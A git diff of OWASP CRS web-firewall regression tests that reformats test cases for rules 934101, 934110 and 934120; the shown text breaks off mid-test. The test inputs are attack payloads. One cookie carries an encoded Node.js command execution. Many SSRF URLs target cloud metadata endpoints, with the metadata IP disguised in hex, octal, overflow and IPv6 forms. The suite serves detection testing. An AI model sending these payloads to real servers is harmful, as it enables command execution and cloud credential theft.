input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Cookie: test_cookie=\u0063\u006dVxdWlyZSgiY2hpbGRfcHJvY2VzcyIpLmV4ZWMoJ3dob2FtaScpCg== - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - log_contains: id "934101" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Cookie: test_cookie=\u0063\u006dVxdWlyZSgiY2hpbGRfcHJvY2VzcyIpLmV4ZWMoJ3dob2FtaScpCg== + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + log: + expect_ids: [934101] diff --git a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934110.yaml b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934110.yaml index 25fc7eee7..b71b664ce 100644 --- a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934110.yaml +++ b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934110.yaml @@ -1,151 +1,150 @@ --- meta: author: "fzipitria, azurit" - enabled: true - name: "934110.yaml" description: "Test for vanilla SSRF in PL1" +rule_id: 934110 tests: - - test_title: 934110-1 + - test_id: 1 desc: SSRF - check google cloud url stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get/test?ssrf=http%3A%2F%2F169.254.169.254%2FcomputeMetadata%2Fv1%2F" - version: "HTTP/1.1" - output: - log_contains: id "934110" - - test_title: 934110-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get/test?ssrf=http%3A%2F%2F169.254.169.254%2FcomputeMetadata%2Fv1%2F" + version: "HTTP/1.1" + output: + log: + expect_ids: [934110] + - test_id: 2 desc: SSRF - check digitalcloud url stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get/test?ssrf=http%3A%2F%2F169.254.169.254%2Fmetadata%2Fv1.json" - version: "HTTP/1.1" - output: - log_contains: id "934110" - - test_title: 934110-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get/test?ssrf=http%3A%2F%2F169.254.169.254%2Fmetadata%2Fv1.json" + version: "HTTP/1.1" + output: + log: + expect_ids: [934110] + - test_id: 3 desc: SSRF - check packetcloud url stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get/test?ssrf=https%3A%2F%2Fmetadata.packet.net%2Fuserdata" - version: "HTTP/1.1" - output: - log_contains: id "934110" - - test_title: 934110-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get/test?ssrf=https%3A%2F%2Fmetadata.packet.net%2Fuserdata" + version: "HTTP/1.1" + output: + log: + expect_ids: [934110] + - test_id: 4 desc: SSRF - check openstack url stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get/test?ssrf=http%3A%2F%2F169.254.169.254%2Fopenstack" - version: "HTTP/1.1" - output: - log_contains: id "934110" - - test_title: 934110-5 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get/test?ssrf=http%3A%2F%2F169.254.169.254%2Fopenstack" + version: "HTTP/1.1" + output: + log: + expect_ids: [934110] + - test_id: 5 desc: SSRF - check oracle cloud url stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get/test?ssrf=http%3A%2F%2F192.0.0.192%2Flatest%2Fuser-data%2F" - version: "HTTP/1.1" - output: - log_contains: id "934110" - - test_title: 934110-6 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get/test?ssrf=http%3A%2F%2F192.0.0.192%2Flatest%2Fuser-data%2F" + version: "HTTP/1.1" + output: + log: + expect_ids: [934110] + - test_id: 6 desc: SSRF - negative test aws stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get/test?ssrf=169.254.169.254%2Flatest%2Fuser-data" - version: "HTTP/1.1" - output: - no_log_contains: id "934110" - - test_title: 934110-7 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get/test?ssrf=169.254.169.254%2Flatest%2Fuser-data" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [934110] + - test_id: 7 desc: SSRF - negative test aws stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get/test?ssrf=http%3A%2F%2F169.254.169.254%2Flatest" - version: "HTTP/1.1" - output: - no_log_contains: id "934110" - - test_title: 934110-8 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get/test?ssrf=http%3A%2F%2F169.254.169.254%2Flatest" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [934110] + - test_id: 8 desc: SSRF - negative test gcp stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get/test?ssrf=http%3A%2F%2Fmetadata.google.internal" - version: "HTTP/1.1" - output: - no_log_contains: id "934110" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get/test?ssrf=http%3A%2F%2Fmetadata.google.internal" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [934110] diff --git a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934120.yaml b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934120.yaml index d39766afd..697f26b79 100644 --- a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934120.yaml +++ b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934120.yaml @@ -1,891 +1,889 @@ --- meta: author: "fzipitria, Max Leske, azurit" - enabled: true - name: "934120.yaml" - description: "Description" +rule_id: 934120 tests: - - test_title: 934120-1 + - test_id: 1 desc: SSRF - IPv4, Dotless decimal stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=http://2852039166/" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http://2852039166/" + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - test_id: 2 desc: SSRF - IPv4, Dotless decimal with overflow stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=http://7147006462/" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http://7147006462/" + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - test_id: 3 desc: SSRF - IPv4, Dotted hexadecimal stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=http://0xA9.0xFE.0xA9.0xFE/" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http://0xA9.0xFE.0xA9.0xFE/" + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - test_id: 4 desc: SSRF - IPv4, Dotless hexadecimal stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=http://0xA9FEA9FE/" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-5 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http://0xA9FEA9FE/" + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - test_id: 5 desc: SSRF - IPv4, Dotless hexadecimal with overflow stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=http://0x41414141A9FEA9FE/" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-6 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http://0x41414141A9FEA9FE/" + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - test_id: 6 desc: SSRF - IPv4, Dotted octal stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=http://0251.0376.0251.0376/" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-7 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http://0251.0376.0251.0376/" + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - test_id: 7 desc: SSRF - IPv4, Dotted octal with padding stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=http://0251.00376.000251.0000376/" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-8 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http://0251.00376.000251.0000376/" + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - test_id: 8 desc: SSRF - IPv4, dotted, two bytes decimal, two bytes octal stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=http://169.254.43518/" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-9 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http://169.254.43518/" + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - test_id: 9 desc: SSRF - IPv4, dotted, one byte decimal, three bytes octal stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=http://169.16689662/" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-10 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http://169.16689662/" + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - test_id: 10 desc: SSRF - IPv6, first 10 bytes compressed stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=http://[::ffff:a9fe:a9fe]" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-11 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http://[::ffff:a9fe:a9fe]" + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - test_id: 11 desc: SSRF - IPV6 Expanded stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=http://[0:0:0:0:0:ffff:a9fe:a9fe]" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-12 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http://[0:0:0:0:0:ffff:a9fe:a9fe]" + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - test_id: 12 desc: SSRF - IPV6 Expanded - Negative tests stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=[0:0:0:0:0:ffff:a9fe:a9fe]" - version: "HTTP/1.1" - output: - no_log_contains: id "934120" - - test_title: 934120-13 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=[0:0:0:0:0:ffff:a9fe:a9fe]" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [934120] + - test_id: 13 desc: SSRF - Dotless decimal - Negative tests stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=2852039166" - version: "HTTP/1.1" - output: - no_log_contains: id "934120" - - test_title: 934120-14 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=2852039166" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [934120] + - test_id: 14 desc: SSRF - Dotless hexadecimal with overflow - Negative tests stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=0x41414141A9FEA9FE" - version: "HTTP/1.1" - output: - no_log_contains: id "934120" - - test_title: 934120-15 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=0x41414141A9FEA9FE" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [934120] + - test_id: 15 desc: SSRF - Negative tests - IPv4, dotted, one byte decimal, three bytes octal stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=169.16689662" - version: "HTTP/1.1" - output: - no_log_contains: id "934120" - - test_title: 934120-16 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=169.16689662" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [934120] + - test_id: 16 desc: SSRF - Negative tests - IPV6 Compressed stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=[::ffff:a9fe:a9fe" - version: "HTTP/1.1" - output: - no_log_contains: id "934120" - - test_title: 934120-17 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=[::ffff:a9fe:a9fe" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [934120] + - test_id: 17 desc: SSRF - Negative tests - IPV6 Compressed stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=[::ffff:a9fe:a9fe]" - version: "HTTP/1.1" - output: - no_log_contains: id "934120" - - test_title: 934120-18 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=[::ffff:a9fe:a9fe]" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [934120] + - test_id: 18 desc: SSRF - Negative tests - IPV6 Expanded stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=[0:0:0:0:0:ffff:a9fe:a9fe]" - version: "HTTP/1.1" - output: - no_log_contains: id "934120" - - test_title: 934120-19 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=[0:0:0:0:0:ffff:a9fe:a9fe]" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [934120] + - test_id: 19 desc: SSRF - Negative tests - IPV6/IPV4 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=[0:0:0:0:0:ffff:169.254.169.254]" - version: "HTTP/1.1" - output: - no_log_contains: id "934120" - - test_title: 934120-20 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=[0:0:0:0:0:ffff:169.254.169.254]" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [934120] + - test_id: 20 desc: SSRF - Evasion technique 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=http%3A%2F%2Fgoogle.com%3A80%20%26%40google.com%3A80%23%20%40127.88.23.245%3A22%2F" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-21 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http%3A%2F%2Fgoogle.com%3A80%20%26%40google.com%3A80%23%20%40127.88.23.245%3A22%2F" + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - test_id: 21 desc: SSRF - Weird protocol scheme 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 